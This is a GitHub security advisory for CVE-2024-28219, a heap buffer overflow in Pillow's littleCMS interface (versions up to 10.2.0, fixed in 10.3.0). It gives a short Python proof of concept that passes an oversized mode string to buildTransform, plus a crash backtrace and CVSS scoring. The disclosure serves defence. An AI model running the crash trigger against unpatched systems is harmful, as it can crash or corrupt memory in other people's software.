Skip to content

Python: Heap buffer overflow in a Pillow (PIL fork) interface to the littleCMS ICC Color Management System

Moderate
rcorrea35 published GHSA-38jg-4f6j-rq6x May 1, 2024

Package

Pillow (PIL fork) (Python)

Affected versions

<= 10.2.0

Patched versions

10.3.0

Description

Summary

Two strcpy calls were able to copy too much data into fixed length strings in cms_transform_new function from _imagingcms.c.

Severity

Medium

Proof of Concept

from PIL.ImageCms import ImageCmsTransform
from PIL import ImageCms

p1 = ImageCms.getOpenProfile("sGrey-v2-nano.icc")
p2 = ImageCms.getOpenProfile("sGrey-v2-micro.icc")
t = ImageCms.buildTransform(p2, p1, "L;16", "E"*12)

Further Analysis

The grayscale ICC profiles used in PoC could be downloaded from:
https://github.com/saucecontrol/Compact-ICC-Profiles/blob/master/profiles/sGrey-v2-micro.icc?raw=true
https://github.com/saucecontrol/Compact-ICC-Profiles/blob/master/profiles/sGrey-v2-nano.icc?raw=true

Backtrace

gef➤  backtrace 
#0  0x00007ffff6f7dae9 in cmsDeleteTransform () from /lib/x86_64-linux-gnu/liblcms2.so.2
#1  0x00007ffff75ed9bd in ?? () from /usr/lib/python3/dist-packages/PIL/_imagingcms.cpython-311-x86_64-linux-gnu.so
#2  0x000000000055498b in ?? ()
#3  0x00000000004dcb1e in ?? ()
#4  0x000000000060d494 in ?? ()
#5  0x00000000004cc9d7 in ?? ()
#6  0x000000000060cd25 in ?? ()
#7  0x00000000005f44d8 in Py_FinalizeEx ()
#8  0x0000000000603ec5 in Py_RunMain ()
#9  0x00000000005c907b in Py_BytesMain ()
#10 0x00007ffff7cc26ca in __libc_start_call_main (main=main@entry=0x5c8fe0, argc=argc@entry=0x2, argv=argv@entry=0x7fffffffd9e8) at ../sysdeps/nptl/libc_start_call_main.h:58
#11 0x00007ffff7cc2785 in __libc_start_main_impl (main=0x5c8fe0, argc=0x2, argv=0x7fffffffd9e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffd9d8) at ../csu/libc-start.c:360
#12 0x00000000005c8f11 in _start ()

Vendors advisory
https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html#cve-2024-28219-fix-buffer-overflow-in-imagingcms-c

Timeline

Date reported: 2/19/2024
Date fixed: 4/01/2024
Date disclosed: 4/01/2024

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Local
Attack complexity
High
Privileges required
Low
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE ID

CVE-2024-28219

Weaknesses

No CWEs

Credits